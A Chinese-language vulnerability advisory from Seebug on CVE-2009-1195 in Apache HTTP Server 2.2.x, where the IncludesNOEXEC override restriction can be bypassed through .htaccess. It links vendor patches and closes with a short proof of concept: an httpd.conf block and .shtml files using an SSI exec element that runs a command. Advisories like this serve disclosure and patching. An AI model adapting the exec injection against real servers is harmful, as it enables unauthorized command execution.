Apache HTTP Server AllowOverride选项绕过安全限制漏洞

2009-06-2200:00:00

Root

www.seebug.org

123

0.0005 Low

EPSS

Percentile

14.9%

JSON

BUGTRAQ ID: 35115
CVE(CAN) ID: CVE-2009-1195

Apache HTTP Server是一款流行的Web服务器。

Apache HTTP Server没有正确地处理AllowOverride指令中的Options=IncludesNOEXEC选项，本地用户可以通过在.htaccess文件中配置(1) Options Includes、(2) Options +Includes或(3) Options +IncludesNOEXEC并在.shtml文件中注入exec元素导致绕过安全限制获得权限。

Apache 2.2.x
厂商补丁：

Apache Group

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

<a href=“http://svn.apache.org/viewvc?view=rev&revision=652885” target=“_blank”>http://svn.apache.org/viewvc?view=rev&revision=652885</a>

RedHat

RedHat已经为此发布了一个安全公告（RHSA-2009:1075-01）以及相应补丁:
RHSA-2009:1075-01：Moderate: httpd security update
链接：<a href=“https://www.redhat.com/support/errata/RHSA-2009-1075.html” target=“_blank”>https://www.redhat.com/support/errata/RHSA-2009-1075.html</a>


                                                向httpd.conf中添加：

&lt;Directory &quot;/var/www/html/test&quot;&gt;
Options None
AllowOverride Options=IncludesNoEXEC
&lt;/Directory

在/var/www/html/test中创建以下两个文件：

index.shtml:
&lt;html&gt;
&lt;body&gt;
&lt;p&gt;
This document last modified &lt;!--#flastmod file=&quot;front.shtml&quot; --&gt;
&lt;/p&gt;
&lt;p&gt;Start include:&lt;/p&gt;
&lt;!--#include virtual=&quot;/test/test.shtml&quot; --&gt;
&lt;p&gt;End include&lt;/p&gt;
&lt;/body&gt;&lt;/html&gt;

test.shtml:
&lt;html&gt;
&lt;body&gt;
&lt;p&gt;start&lt;/p&gt;
&lt;pre&gt;
&lt;!--#exec cmd=&quot;pwd&quot; --&gt;
&lt;/pre&gt;
&lt;p&gt;end&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;